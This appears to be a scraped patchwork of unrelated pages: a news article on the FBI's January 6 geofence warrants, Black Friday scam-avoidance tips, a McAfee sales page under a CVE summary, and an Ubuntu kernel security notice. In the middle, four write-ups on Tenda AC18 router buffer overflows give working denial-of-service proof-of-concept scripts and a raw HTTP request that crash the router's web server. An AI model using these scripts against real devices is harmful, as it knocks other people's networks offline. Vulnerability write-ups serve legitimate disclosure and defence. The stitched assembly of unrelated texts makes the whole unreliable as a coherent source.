Google provided investigators with location data for more than 5,000 devices as part of the federal investigation into the attack on the US Capitol.

The FBI’s biggest-ever investigation included the biggest-ever haul of phones from controversial geofence warrants, court records show. A filing in the case of one of the January 6 suspects, David Rhine, shows that Google initially identified 5,723 devices as being in or near the US Capitol during the riot. Only around 900 people have so far been charged with offenses relating to the siege.

The filing suggests that dozens of phones that were in airplane mode during the riot, or otherwise out of cell service, were caught up in the trawl. Nor could users erase their digital trails later. In fact, 37 people who attempted to delete their location data following the attacks were singled out by the FBI for greater scrutiny.

Geofence search warrants are intended to locate anyone in a given area using digital services. Because Google’s Location History system is both powerful and widely used, the company is served about 10,000 geofence warrants in the US each year. Location History leverages GPS, Wi-Fi, and Bluetooth signals to pinpoint a phone within a few yards. Although the final location is still subject to some uncertainty, it is usually much more precise than triangulating signals from cell towers. Location History is turned off by default, but around a third of Google users switch it on, enabling services like real-time traffic prediction. 

The geofence warrants served on Google shortly after the riot remained sealed. But lawyers for Rhine, a Washington man accused of various federal crimes on January 6, recently filed a motion to suppress the geofence evidence. The motion, which details the warrant’s process and scale, was first reported by the Empty Wheel blog. 

In a statement, a Google spokesperson defended the company’s handling of geofence warrants.

“We have a rigorous process for geofence warrants that is designed to protect the privacy of our users while supporting the important work of law enforcement,” the company said. “When Google receives legal demands, we examine them closely for legal validity and constitutional concerns, including overbreadth, consistent with developing case law. If a request asks for too much information, we work to narrow it. We routinely push back on overbroad demands, including overbroad geofence demands, and in some cases, we object to producing any information at all.”

Google requires a three-step process for geofence warrants to narrow their scope to only those most likely to be guilty of a crime. In the first and broadest step, the FBI asked Google to identify all devices in a 4-acre area, including the Capitol and its immediate surroundings, between 2 pm and 6:30 pm on January 6. Google initially found 5,653 active devices that “were or could have been” within the geofence at that time. When Google added in data from devices that only connected to its servers later that day, or the next, the number increased to 5,723. (Location History works in airplane mode because phones can continue to receive GPS satellite signals.)

In the second step, the FBI asked Google for a list of devices that were present at the Capitol from 12 pm to 12:15 pm on January 6, and from 9 pm to 9:15 pm. As there were no rioters in the Capitol during those times, these devices likely belonged to congressional members or staff, police, and other people authorized to be there. Over 200 such phones were excluded from the initial list, reducing its total to 5,518. 

For the final step, the government sought subscriber information, including phone numbers, Google accounts, and email addresses, for two groups of users. The first was for devices that appeared to have been entirely within the geofence, to about a 70 percent probability. The second was any devices for which the Location History was deleted between January 6 and January 13. 

From this, in early May 2021, the FBI received identifying details for 1,535 users, as well as detailed maps showing how their phones moved through the Capitol and its grounds. Geofence evidence has so far been cited in over 100 charging documents from January 6. In nearly 50 cases, geofence data seems to have provided the initial identification of suspected rioters. 

Rhine was first flagged to the FBI by tipsters who had heard that he had been inside the Capitol. But investigators only identified him in surveillance footage after they matched it against the precise geofence coordinates of his phone. His lawyer is now trying to get the geofence evidence thrown out on a number of grounds, including that it was overly broad in who it rounded up, and that Rhine had a constitutional expectation of privacy in his Google data. 

“The government enlisted Google to search untold millions of unknown accounts in a massive fishing expedition,” the attorneys wrote. “Just a small amount of Location History can identify individuals … engaged in personal and protected activities (such as exercising their rights under the First Amendment). And as a result, a geofence warrant almost always involves intrusion into constitutionally protected areas.”

If the judge tosses the geofence evidence in the Rhine case, there is a chance that he and other suspects identified using it could walk free. 

Matthew Tokson, a law professor and Fourth Amendment expert at the University of Utah, says there remains a high level of uncertainty around the whole idea of geofence warrants: “Some courts have said they are valid. Some have said they are overbroad and sweep up too many innocent people. We are still in the very early stages of this.”

Despite the unprecedented number of individuals swept up in the January 6 search warrant and some strong arguments from Rhine’s lawyer, Tokson thinks the chance of his motion succeeding is very low. “Unlike a geofence warrant for a bank robbery, the people in this location are all likely to be engaged in at least a low-level criminal trespass and in some cases worse,” he says. “There’s a stronger than usual probable cause argument in favor of the government here.”

Andrew Ferguson, a professor of law at American University, agrees. “And that worries me because the January 6 cases are going to be used to build a doctrine that will essentially enable police to find almost anyone with a cellphone or a smart device in ways that we, as a society, haven’t quite grasped yet,” he says. “That is going to undermine the work of journalists, it’s going to undermine political dissenters, and it's going to harm women who are trying to get abortion services.”

The judge is likely to rule on Rhine’s motion in December, with his trial scheduled for late January 2023. While that will decide Rhine’s fate, it is unlikely to settle the question of geofence warrants more broadly. “This very likely will be appealed one way or the other,” says Tokson. “It’s going to be a very high-level, high-profile case likely to generate a major precedent out of the appeals court, if not the Supreme Court.”

A Peek Inside the FBI's Unprecedented January 6 Geofence Dragnet

'Tis the season for swindlers and hackers. Use these tips to spot frauds and keep your payment info secure.

Black Friday attracts crowds, and crowds attract scammers, and that means you need to take extra care when shopping online over the Black Friday and Cyber Monday weekend. There'll be people out there eager to relieve you of more money than you'll save on a TV set or a gaming console.

The following precautions apply any time of year, but it's worth reminding yourself of them every time a serious holiday season comes around. In the rush to get gifts sorted, it's all too easy to miss a warning sign, or get complacent about online security.

Update All Your Software

Keeping programs and operating systems up to date is important enough that Microsoft, Apple, Google, Mozilla, and all the other big names in tech now make it difficult for anyone to lag behind with their updates—most of the time you'll be prompted regularly to install new versions of your software, and it might even happen automatically in the background without you noticing.

The biggest retail event of the year has grown into an entire month of sales that ebb and flow. Here’s how to make the most of it.

Today's browsers, apps, and OSes are adept at spotting scams as they happen, whether it's phishing emails (designed to lure you to a fake shopping or banking site) or unauthorized logins on your accounts. To make the most of this built-in security, ensure you're running the latest versions across the board, which means the latest security patches—if you've been putting off updates on your phone or your computer, then get them done ahead of Black Friday.

If you do have a laptop that's too old to run the latest versions of Windows or macOS, avoid using it if possible—you'll be safer shopping on your phone, as long as it's running the most recent Android or iOS updates. On Android, you can check for updates via **System** and **System Update** in Settings; on iOS, it's **Settings** and then **General** and **Software Update**.

Be Wary of Email and Social Media Deals

You're likely to be inundated with special offers over email and social media this Black Friday, but be careful when it comes to clicking through on deals that come from suspicious sources (stores you've never shopped at before, for example). Always check that the link you clicked sent you to the website you were expecting to visit.

There's no hard and fast way to guarantee you'll never get caught out by a dodgy link (apart from just ignoring them all completely), but you can minimize the risk: Check that the social media account or email address sending the link is genuine, head to the site in question in a separate browser window to see whether you can find the same offer advertised, and be sure the offer you're looking at is the one that was promoted.

If your browser is up to date, as we mentioned above, dangerous links should be blocked before you reach them, but we'd still recommend being wary. You'll see some great offers advertised over social media and email, but no discount is worth the risk of exposing yourself to scammers.

Make sure all your devices are updated before shopping.

Android via David Nield

Do Your Research

Wherever possible, stick to trusted stores online. All the major players have robust security procedures in place, so the chances of them (and you) getting hacked are smaller. Still, if you're buying from any site, always check you're on the store website you think you are by checking in your browser's address bar.

We're not saying you should never shop at smaller outlets, but make sure they're using HTTPS technology (indicated with a padlock in your browser's address bar). Look for contact details, an office with a physical address, and reviews left by other users (Trustpilot can be helpful here). See if they're on Twitter and Facebook—and whether those accounts are actually active.

Debit and credit card issuers will usually protect you against fraud—check their policies online if you're not sure about yours—but nevertheless, keep an eye on your bank accounts throughout the Black Friday weekend to make sure only the amounts you're expecting to be debited are going out.

Double-Check Deals

Retailers change their prices all the time—especially online—so a "big discount" you see might only apply to whatever the price was last week, not what it's been over the course of the past year. Price trackers such as CamelCamelCamel can help you work out whether you're getting a genuine bargain or just something that was already heavily reduced.

Checking out product reviews on the web is a useful way of determining how current something is and how much you should be spending on it. Are you looking at the genuine article, or just a cheap knock-off? Is the gadget you're about to buy future-proofed with the latest tech or will it be out of date in six months? And (especially on Amazon) is it being sent from your current region or the other side of the world? Who's the actual seller? Make sure you read what previous buyers have to say via the user reviews before spending your money.

Just be aware that stores also use the occasion to try and shift their remaining stock of older, less popular products. Make sure you're looking at what you're buying and not just the price drop.

CamelCamelCamel will show you previous price drops on Amazon.

CamelCamelCamel via David Nield

Protect Your Accounts

As always, keep your accounts locked down and protected on Black Friday. Use strong, unique passwords for all your accounts (a dedicated password manager or your browser's password management system can help here), and turn on two-factor authentication on every account that offers it (Microsoft, Apple, Google, Facebook, and Twitter ones all do, for a start).

While it may seem convenient to quickly set up a new shopping account with your “usual” password, it only takes one account sharing the same password to get exposed, and all the others can come tumbling down after it. If you're using the latest versions of Chrome and Safari, you'll notice you can now use a strong password suggested by your browser (the option should pop up automatically when you're in a password field).

If you're planning on shopping at outlets where you haven't purchased anything before, it's a good idea to get these accounts set up ahead of time—this means you aren't rushing when it comes to thinking up new passwords and entering potentially sensitive information into your web browser.

Guard Your Payment Info

Many places that you're shopping at on Black Friday and Cyber Monday will already have your payment info on file, but if you're entering details into a new site, again make sure the padlock symbol is showing in the address bar—the full URL should also begin “https://”, which indicates that your payment details will be encrypted in transit.

If you’re on vacation or out of town, we recommend waiting until you get back home before buying anything—or at least using the cellular data on your phone to make a connection rather than a public Wi-Fi hotspot, as it's much harder for hackers to intercept your details (or look over your shoulder as you're typing them). If you are shopping in-store, be careful to guard your PIN numbers and other sensitive details when you're surrounded by crowds—or even just one shop assistant.

As tempting as Black Friday offers might be, it's usually a good idea to shop in as few places as possible, if you can: The fewer companies that hold your payment data, the less likely you are to be victim to a data breach, and the risk of those breaches are really down to the company's security policies rather than any precautions you can take.

How to Avoid Black Friday Scams Online

McAfee Total Protection prior to version 16.0.49 contains an uncontrolled search path element vulnerability due to the use of a variable pointing to a subdirectory that may be controllable by an unprivileged user. This may have allowed the unprivileged user to execute arbitrary code with system privileges.

NEW  **Introducing**

****Get savings**  
on protection**

The **Black Friday Sale** is here with all the discounts you expect on all-in-one protection.

Windows® | macOS® | Android™ | iOS® | ChromeOS™️

NEW  **Introducing**

****Personalized** protection**

All-in-one protection for your identity, privacy, and more. Includes antivirus, VPN, and Protection Score.

NEW  **Introducing**

****The ultimate protection** for your privacy**

We help you stay private and secure online with personal data removal from risky sites, $1M identity theft coverage, device protection, and more.

NEW  **Introducing**

****Stop fraud** before it starts**

Credit monitoring offers daily updates to your credit score, including alerts to changes that may signal identity fraud.​

NEW  **Introducing**

****Next-level confidence** for identity, privacy, and device protection​**

Our ultimate identity and privacy protection to confidently live life online, with comprehensive identity monitoring, credit monitoring, credit freeze and lock, up to $1M identity theft coverage, and help to remove your personal info online.

**Live your life online freely and confidently  
with award-winning online protection**

**$1 million in coverage**

Advanced plans include $1,000,000 coverage to cover eligible losses and fees due to identity theft and fraud.‡

**24/7/365 customer support**

Get around the clock assistance from friendly, knowledgable security experts.

**100% guaranteed**

We pledge to remove viruses on your devices or give you your money back, guaranteed.\*\*

****We’ve got your back****

Guided, personalized online protection that makes being safe simple, wherever you are.

**Do what you do online, we’ll protect your privacy**

**New!** Remove your personal info from the riskiest data broker sites that sell it with

Personal Data Cleanup

. We scan **2x data broker sites** compared to similar cybersecurity services. Available with our Premium and higher-tier plans.

Stay private with a **VPN** that turns on automatically for public Wi-Fi, protecting account credentials, search habits, and more.

**Take action to help prevent identity theft**

**New!**

Security Freeze

helps prevent unauthorized access to new or existing credit, bank, and utility accounts in your name. Available in Advanced plans.​

We help you monitor your email addresses, SSN, bank account and credit card numbers and more. If we detect a change, we'll alert you an average of **10 months sooner** than the competition.​​​

$1M identity theft coverage & restoration

is available in Advanced plans.​​

Get expanded monitoring with auto-renewal turned on.

**Protection Score keeps you safer**

Protection Score checks the health of your online protection and provides simple instructions to improve your security. Knowing how safe you are is the first step toward a safer life online—what's your Protection Score?

**Protect your computers and smartphones**

Get 24/7 protection with award-winning antivirus and safe browsing security. Avoid risky websites, and stay safe from phishing, viruses, hackers and ransomware.

Previous Next

**What our customers are saying**

I love the new UI experience, the app really needed the new look. The app **protects my device against viruses and malware really well**

\- Drew M

★ ★ ★ ★ ★

Use it on all my devices, trusted without problems! Also **the ID Protection is amazing...**.get it now.​

\- Joe

★ ★ ★ ★ ★

I feel much more **protected from identity theft, viruses, and malware**

\- M.B.

★ ★ ★ ★ ★

Easy to download and use. **Gives me peace of mind.**

\- Jeanne C

★ ★ ★ ★ ★

**I feel very secure with McAfee Security.** I get notifications of breaches and immediately take action to resolve them.

\- Kelly G

★ ★ ★ ★ ★

I have loved the VPN option and feel safer now when connecting to public wifi.

\- Su L

★ ★ ★ ★ ★

**Keeps me safe all the time,** is there right behind me doing its thing. Always a pleasure. Protects my desktop PC as well for going on 9 years now. No complaints.

\- Anglynn

★ ★ ★ ★ ★

Excellent! I am very happy with the way **McAfee blocks spam constantly** as well as other unwanted visitors.

\- Maxine P

★ ★ ★ ★ ★

Great relief from fear of Hackers. I have great confidence with McAfee products, they provide me **excellent service to all my family devices.** Keep up the good work.

\- Padma M

★ ★ ★ ★ ★

Makes me feel more safe when online. Love the VPN feature. Love the fact that it **keeps me informed about threats,** how to deal with or that they dealt with the problem.

\- Elain W

★ ★ ★ ★ ★

**VPN, Antivirus and safe WiFi all in one App.** Seemless automatic scanning. Has solved problems with Identity theft and unwanted spam. Great Safe Browsing feature.

\- Rudy C

★ ★ ★ ★ ★

I didn't realize how much of my personal information was out there.

\- Ed B

★ ★ ★ ★ ★

I like feeling confident that **McAfee is working to protect my personal information.**

\- Janis C

★ ★ ★ ★ ★

Easy to use and necessary to have. **Wonderful!**

\- Aris C

★ ★ ★ ★ ★

****Industry-leading** online  
protection loved by millions**

****Trusted security****

for over 600 million devices

****Highest rating****

for security by SE Labs

****42 million****

threats blocked per day

**Clean up and speed up with ​**McAfee PC Optimizer****

Get your PC running up to twice as fast and boost your internet with just a few clicks with PC Optimizer. We'll remove outdated files, optimize your system, and reclaim bandwidth. Say goodbye to frustrating lag and enjoy your life online.

****Try** McAfee Total Protection for free**

Stay safe. Experience more. With McAfee Total Protection, you can easily protect how you browse, game, and connect, now with identity and privacy protection. Try our all-in-one online protection free for 30 days. ​

Windows® | macOS® | Android™ | iOS® | ChromeOS™

****Complete protection** for your mobile online life**

With McAfee Mobile Security, extend your online protection and privacy with a simple, all-in-one security solution. Connect confidently from the palm of your hand wherever you go.

Scan this QR code to download the McAfee Security mobile app directly to your phone or tablet from the Apple or Google Play app store.

CVE-2022-43751: Antivirus, VPN, Identity & Privacy Protection | McAfee

There is a buffer overflow vulnerability in ZTE MF286R. Due to lack of input validation on parameters of the wifi interface, an authenticated attacker could use the vulnerability to perform a denial of service attack.

CVE-2022-39067: Security Bulletin Details

Tenda AC18 V15.03.05.19 is vulnerable to Buffer Overflow via function form_fast_setting_wifi_set.

Permalink

Cannot retrieve contributors at this time

**Tenda AC18(V15.03.05.19) has a Stack Buffer Overflow Vulnerability****Product**

1.  product information: https://www.tenda.com.cn/
2.  firmware download: https://www.tenda.com.cn/download/detail-2683.html

**Affected version**

V15.03.05.19

**Vulnerability**

The stack overfow vulnerability is in /bin/httpd. The vulnerability occurrs in the form_fast_setting_wifi_set function, which can be accessed through the URL goform/fast_setting_wifi_set .

This function accepts the POST parameter timeZone, does not verify its length, and copies it directly to a local variable on the stack, causing a stack overflow. This vulnerability allows attackers to cause a Denial of Service (DoS).

**PoC**

Poc of Denial of Service(DoS)

 import requests
pl \= b"A"\*0x100 + b":" + b"A"\*0x400
data \= {
    b"ssid": b'A',
    b"timeZone": pl
}
res \= requests.post("http://192.168.0.1/goform/fast\_setting\_wifi\_set", data\=data)
print(res.content)

CVE-2022-44171: IoT_vuln/Tenda_AC18_V15.03.05.19_Vuln_timeZone.md at main · RobinWang825/IoT_vuln

Tenda AC18 V15.03.05.19 is vulnerable to Buffer Overflow via function formWifiWpsStart.

**Tenda AC18(V15.03.05.19) has a Stack Buffer Overflow Vulnerability****Product**

1.  product information: https://www.tenda.com.cn/
2.  firmware download: https://www.tenda.com.cn/download/detail-2683.html

**Affected version**

V15.03.05.19

**Vulnerability**

The stack overfow vulnerability is in /bin/httpd. The vulnerability occurrs in the formWifiWpsStart function, which can be accessed through the URL goform/WifiWpsStart .

The index and mode are controllable. If the conditions are met to sprintf, they will be spliced into tmp. It is worth noting that there is no size check,which leads to a stack overflow vulnerability. This vulnerability allows attackers to cause a Denial of Service (DoS).

**PoC**

Poc of Denial of Service(DoS)

import socket
import os

li \= lambda x : print('\\x1b\[01;38;5;214m' + x + '\\x1b\[0m')
ll \= lambda x : print('\\x1b\[01;38;5;1m' + x + '\\x1b\[0m')

ip \= '192.168.0.1'
port \= 80

r \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)

r.connect((ip, port))

rn \= b'\\r\\n'

p1 \= b'a' \* 0x3000
p2 \= b'mode=1&index=' + p1

p3 \= b"POST /goform/WifiWpsStart" + b" HTTP/1.1" + rn
p3 += b"Host: 192.168.0.1" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8" + rn
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: curShow=; ac\_login\_info=passwork; test=A; password=1111" + rn
p3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) +rn
p3 += b'Content-Type: application/x-www-form-urlencoded'+rn
p3 += rn
p3 += p2
r.send(p3)

response \= r.recv(4096)
response \= response.decode()
li(response)

CVE-2022-44177: IoT_vuln/Tenda/AC18/formWifiWpsStart at main · RobinWang825/IoT_vuln

Tenda AC18 V15.03.05.19 is vulnerable to Buffer Overflow via function formSetWifiGuestBasic.

**Tenda AC18(V15.03.05.19) has a Stack Buffer Overflow Vulnerability****Product**

1.  product information: https://www.tenda.com.cn/
2.  firmware download: https://www.tenda.com.cn/download/detail-2683.html

**Affected version**

V15.03.05.19

**Vulnerability**

The stack overfow vulnerability is in /bin/httpd. The vulnerability occurrs in the formSetWifiGuestBasic function, which can be accessed through the URL goform/SetWifiGuestBasic.

In formSetWifiGuestBasic function, v14 is controllable and will be passed into the sub_7EA98 function. In the sub_7EA98 function, a2 will be spliced into s by sprintf. It is worth noting that there is no size check, which leads to a stack overflow vulnerability.

In set_wl_guest_qos_list function

In sub_7EA98 function

**PoC**

import socket
import os

li \= lambda x : print('\\x1b\[01;38;5;214m' + x + '\\x1b\[0m')
ll \= lambda x : print('\\x1b\[01;38;5;1m' + x + '\\x1b\[0m')

ip \= '192.168.0.1'
port \= 80

r \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)

r.connect((ip, port))

rn \= b'\\r\\n'

p1 \= b'a' \* 0x3000
p2 \= b'shareSpeed=' + p1

p3 \= b"POST /goform/SetWifiGuestBasic" + b" HTTP/1.1" + rn
p3 += b"Host: 192.168.0.1" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8" + rn
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: curShow=; ac\_login\_info=passwork; test=A; password=1111" + rn
p3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) +rn
p3 += b'Content-Type: application/x-www-form-urlencoded'+rn
p3 += rn
p3 += p2

r.send(p3)

response \= r.recv(4096)
response \= response.decode()
li(response)

CVE-2022-44183: IoT_vuln/Tenda/AC18/formSetWifiGuestBasic at main · RobinWang825/IoT_vuln

Tenda AC18 V15.03.05.19 is vulnerable to Buffer Overflow. via function formWifiWpsOOB.

**Tenda AC18(V15.03.05.19) has a Stack Buffer Overflow Vulnerability****Product**

1.  product information: https://www.tenda.com.cn/
2.  firmware download: https://www.tenda.com.cn/download/detail-2683.html

**Affected version**

V15.03.05.19

**Vulnerability**

The stack overfow vulnerability is in /bin/httpd. The vulnerability occurrs in the formWifiWpsOOB function, which can be accessed through the URL goform/WifiWpsOOB .

The index is controllable. If the conditions are met to sprintf, they will be spliced into tmp. It is worth noting that there is no size check, which leads to a stack overflow vulnerability. An attacker can obtain a stable root shell through a carefully constructed payload.

**PoC**

Poc of Denial of Service(DoS)

POST /goform/WifiWpsOOB HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: \*/\*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded;
Content-Length: 336
Origin: http://192.168.0.1
DNT: 1
Connection: close
Referer: http://192.168.0.1/index.html
Cookie: ecos\_pw=eee:language=cn

index=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

CVE-2022-44178: IoT_vuln/Tenda/AC18/formWifiWpsOOB at main · RobinWang825/IoT_vuln

Tenda AC18 V15.03.05.19 is vulnerable to Buffer Overflow via function addWifiMacFilter.

The stack overfow vulnerability is in /bin/httpd. The vulnerability occurrs in the addWifiMacFilter function, which can be accessed via the URL goform/addWifiMacFilter.

deviceId, deviceMac, are controllable and will be copied to nptr by sprintf. It is worth noting that the size is not checked, resulting in a stack overflow vulnerability.

import socket
import os

li \= lambda x : print('\\x1b\[01;38;5;214m' + x + '\\x1b\[0m')
ll \= lambda x : print('\\x1b\[01;38;5;1m' + x + '\\x1b\[0m')

ip \= '192.168.0.1'
port \= 80
r \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)
r.connect((ip, port))
rn \= b'\\r\\n'
p1 \= b'a' \* 0x3000
p2 \= b'device\_id=1&device\_mac=' + p1
p3 \= b"POST /goform/addWifiMacFilter" + b" HTTP/1.1" + rn
p3 += b"Host: 192.168.0.1" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8" + rn
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: password=1111" + rn
p3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) +rn
p3 += b'Content-Type: application/x-www-form-urlencoded'+rn
p3 += rn
p3 += p2

r.send(p3)

response \= r.recv(4096)
response \= response.decode()
li(response)

CVE-2022-44180: IoT_vuln/Tenda/AC18/addWifiMacFilter at main · RobinWang825/IoT_vuln

David Bouman discovered that the netfilter subsystem in the Linux kernel did not properly validate passed user register indices. A local attacker could use this to cause a denial of service or possibly execute arbitrary code. David Bouman and Billy Jheng Bing Jhong discovered that a race condition existed in the io_uring subsystem in the Linux kernel, leading to a use- after-free vulnerability. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. Various other issues were also addressed.

Linux kernel vulnerabilities

A security issue affects these releases of Ubuntu and its derivatives:

-   Ubuntu 20.04 LTS  
-   Ubuntu 18.04 LTS  
-   Ubuntu 22.04 LTS

Summary

Several security issues were fixed in the kernel.

Software Description

-   linux - Linux kernel  
-   linux-aws - Linux kernel for Amazon Web Services (AWS) systems  
-   linux-azure - Linux kernel for Microsoft Azure Cloud systems  
-   linux-gcp - Linux kernel for Google Cloud Platform (GCP) systems  
-   linux-gke - Linux kernel for Google Container Engine (GKE) systems  
-   linux-gkeop - Linux kernel for Google Container Engine (GKE) systems  
-   linux-ibm - Linux kernel for IBM cloud systems

Details

David Bouman discovered that the netfilter subsystem in the Linux kernel  
did not properly validate passed user register indices. A local attacker  
could use this to cause a denial of service or possibly execute  
arbitrary code. (CVE-2022-1015)

David Bouman and Billy Jheng Bing Jhong discovered that a race condition  
existed in the io_uring subsystem in the Linux kernel, leading to a use-  
after-free vulnerability. A local attacker could use this to cause a  
denial of service (system crash) or possibly execute arbitrary code.  
(CVE-2022-2602)

Sönke Huster discovered that an integer overflow vulnerability existed  
in the WiFi driver stack in the Linux kernel, leading to a buffer  
overflow. A physically proximate attacker could use this to cause a  
denial of service (system crash) or possibly execute arbitrary code.  
(CVE-2022-41674)

Sönke Huster discovered that the WiFi driver stack in the Linux kernel did  
not properly perform reference counting in some situations, leading to a  
use-after-free vulnerability. A physically proximate attacker could use  
this to cause a denial of service (system crash) or possibly execute  
arbitrary code. (CVE-2022-42720)

Sönke Huster discovered that the WiFi driver stack in the Linux kernel did  
not properly handle BSSID/SSID lists in some situations. A physically  
proximate attacker could use this to cause a denial of service (infinite  
loop). (CVE-2022-42721)

Sönke Huster discovered that the WiFi driver stack in the Linux kernel  
contained a NULL pointer dereference vulnerability in certain situations. A  
physically proximate attacker could use this to cause a denial of service  
(system crash). (CVE-2022-42722)

Update instructions

The problem can be corrected by updating your kernel livepatch to the  
following versions:

Ubuntu 20.04 LTS  
    aws - 90.2  
    aws - 90.3  
    azure - 90.2  
    gcp - 90.2  
    gcp - 90.3  
    generic - 90.2  
    gke - 90.2  
    gke - 90.3  
    gkeop - 90.2  
    ibm - 90.2  
    lowlatency - 90.2

Ubuntu 18.04 LTS  
    aws - 90.2  
    azure - 90.2  
    gcp - 90.2  
    generic - 90.2  
    gke - 90.2  
    gkeop - 90.2  
    ibm - 90.2  
    lowlatency - 90.2

Ubuntu 22.04 LTS  
    aws - 90.1  
    aws - 90.2  
    azure - 90.1  
    azure - 90.2  
    gcp - 90.1  
    gcp - 90.2  
    generic - 90.2  
    gke - 90.1  
    gke - 90.2  
    ibm - 90.1  
    ibm - 90.2  
    lowlatency - 90.2

Support Information

Kernels older than the levels listed below do not receive livepatch  
updates. If you are running a kernel version earlier than the one listed  
below, please upgrade your kernel as soon as possible.

Ubuntu 20.04 LTS  
    linux-aws-5.15 - 5.15.0-1000  
    linux-aws - 5.4.0-1009  
    linux-aws - 5.4.0-1061  
    linux-azure-5.15 - 5.15.0-1069  
    linux-azure - 5.4.0-1010  
    linux-gcp-5.15 - 5.15.0-1000  
    linux-gcp - 5.4.0-1009  
    linux-gke-5.15 - 5.15.0-1000  
    linux-gke - 5.4.0-1033  
    linux-gkeop - 5.4.0-1009  
    linux-hwe - 5.15.0-0  
    linux-ibm-5.15 - 5.15.0-1000  
    linux-ibm - 5.4.0-1009  
    linux-oem - 5.4.0-26  
    linux - 5.4.0-26

Ubuntu 18.04 LTS  
    linux-aws-5.4 - 5.4.0-1069  
    linux-aws - 4.15.0-1054  
    linux-aws - 4.15.0-1119  
    linux-azure-4.15 - 4.15.0-1115  
    linux-azure-5.4 - 5.4.0-1069  
    linux-gcp-4.15 - 4.15.0-1121  
    linux-gcp-5.4 - 5.4.0-1069  
    linux-gke-4.15 - 4.15.0-1076  
    linux-gke-5.4 - 5.4.0-1009  
    linux-gkeop-5.4 - 5.4.0-1007  
    linux-hwe-5.4 - 5.4.0-26  
    linux-ibm-5.4 - 5.4.0-1009  
    linux-oem - 4.15.0-1063  
    linux - 4.15.0-69

Ubuntu 16.04 ESM  
    linux-aws-hwe - 4.15.0-1126  
    linux-aws - 4.4.0-1098  
    linux-aws - 4.4.0-1129  
    linux-azure - 4.15.0-1063  
    linux-azure - 4.15.0-1078  
    linux-azure - 4.15.0-1114  
    linux-gcp - 4.15.0-1118  
    linux-hwe - 4.15.0-143  
    linux-hwe - 4.15.0-69  
    linux - 4.4.0-168  
    linux - 4.4.0-211

Ubuntu 22.04 LTS  
    linux-aws - 5.15.0-1000  
    linux-azure - 5.15.0-1000  
    linux-gcp - 5.15.0-1000  
    linux-gke - 5.15.0-1000  
    linux-ibm - 5.15.0-1000  
    linux - 5.15.0-24  
    linux - 5.15.0-25

Ubuntu 14.04 ESM  
    linux-lts-xenial - 4.4.0-168

References

-   CVE-2022-1015  
-   CVE-2022-2602  
-   CVE-2022-41674  
-   CVE-2022-42720  
-   CVE-2022-42721  
-   CVE-2022-42722

Tag

#wifi